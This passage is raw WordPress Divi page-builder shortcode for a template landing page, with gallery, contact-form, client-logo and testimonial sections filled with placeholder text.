border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Make it amazing</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"0px||104px|\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"0px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Call To Action\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"520px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\" button_url=\"#\" button_text=\"START NOW\" custom_margin=\"0px|||\"]\r\n\r\n\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Gallery\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Gallery</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Control your photos.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Control your photos.</span></p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"40px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" gutter_width=\"2\" parallax_2=\"off\" parallax_method_2=\"off\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/12.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/13.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"left\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"32px|||\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"12px|||\" custom_padding_phone=\"0px|||\"][et_pb_column type=\"4_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/14.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"left\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"0px||104px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"0px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Call To Action\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"520px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\" button_url=\"#\" button_text=\"VIEW MORE\" custom_margin=\"0px|||\"]\r\n\r\n\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#212a35\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"28px||28px|\" custom_padding_last_edited=\"on|tablet\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_number_counter admin_label=\"Number Counter\" title=\"Numbers\" number=\"2246\" percent_sign=\"off\" counter_color=\"#7EBEC5\" background_layout=\"light\" title_font=\"Roboto||||\" title_font_size=\"24\" title_text_color=\"#ffffff\" title_line_height=\"1.1em\" number_font=\"Roboto||||\" number_text_color=\"#00bcd4\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;||text-align:left;\" custom_css_number_counter_title=\"font-weight:400;\"]\r\n\r\n\r\n\r\n[/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_number_counter admin_label=\"Number Counter\" title=\"Numbers\" number=\"847\" percent_sign=\"off\" counter_color=\"#7EBEC5\" background_layout=\"light\" title_font=\"Roboto||||\" title_font_size=\"24\" title_text_color=\"#ffffff\" title_line_height=\"1.1em\" number_font=\"Roboto||||\" number_text_color=\"#00bcd4\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;||text-align:left;\" custom_css_number_counter_title=\"font-weight:400;\"]\r\n\r\n\r\n\r\n[/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_number_counter admin_label=\"Number Counter\" title=\"Numbers\" number=\"5623\" percent_sign=\"off\" counter_color=\"#7EBEC5\" background_layout=\"light\" title_font=\"Roboto||||\" title_font_size=\"24\" title_text_color=\"#ffffff\" title_line_height=\"1.1em\" number_font=\"Roboto||||\" number_text_color=\"#00bcd4\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;||text-align:left;\" custom_css_number_counter_title=\"font-weight:400;\"]\r\n\r\n\r\n\r\n[/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Contact\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\" custom_margin=\"||14px|\"]\r\n\r\n<p>Contact</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Get in touch.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Get in touch.</span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"48px||104px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"12px|||\" custom_padding_phone=\"0px|||\" custom_width_px=\"780px\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"on\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"4\" title_font_size=\"18\" title_text_color=\"#5b666d\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#5b666d\" use_border_color=\"on\" border_color=\"#d7dce1\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"9\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\r\n\r\n[et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Message\" field_type=\"text\" field_id=\"Message\" required_mark=\"on\" /]\r\n\r\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Clients\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Clients</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Trusted and used by many big companies.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Trusted and used by many big companies.</span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"800px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"70px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"24px\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-top: 1px solid #D7DCE1;\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Testimonials\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Testimonials</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Trusted and used by many big companies.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Trusted and used by many big companies.</span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"58px||104px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" parallax_2=\"off\" parallax_method_2=\"off\" custom_width_px=\"860px\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:300;\"]\r\n\r\n<p>\"I use Testimonial Generator often. Great job, I will definitely be ordering again! I\'m good to go. \"</p>\r\n\r\n[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"36px||0px|\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"12px||0px|\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\" text_font_size=\"18\" text_line_height=\"1.4em\"]\r\n\r\n<p>Rick F.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\" custom_margin=\"||40px|\"]\r\n\r\n<p>Designer at Ciao</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:300;\"]\r\n\r\n<p>\"Fantastic, I\'m totally blown away by Testimonial Generator. I’ll use it again! I’m cool and you know it.\"</p>\r\n\r\n[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/008.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"36px||0px|\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"12px||0px|\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\" text_font_size=\"18\" text_line_height=\"1.4em\"]\r\n\r\n<p>Mark A.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\"]\r\n\r\n<p>Visual artist</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"20px||40px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"0px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Step\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p><img style=\"float: left;margin: -5px 15px 2px 0px\" class=\"size-full wp-image-4662\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" alt=\"03\" width=\"40\" height=\"40\">Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"by\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p><img style=\"float: left;margin: -5px 15px 2px 0px\" class=\"size-full wp-image-4662\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" alt=\"03\" width=\"40\" height=\"40\">Jump start</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Step\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p><img style=\"float: left;margin: -5px 15px 2px 0px\" class=\"size-full wp-image-4662\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" alt=\"03\" width=\"40\" height=\"40\">Make it amazing</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" 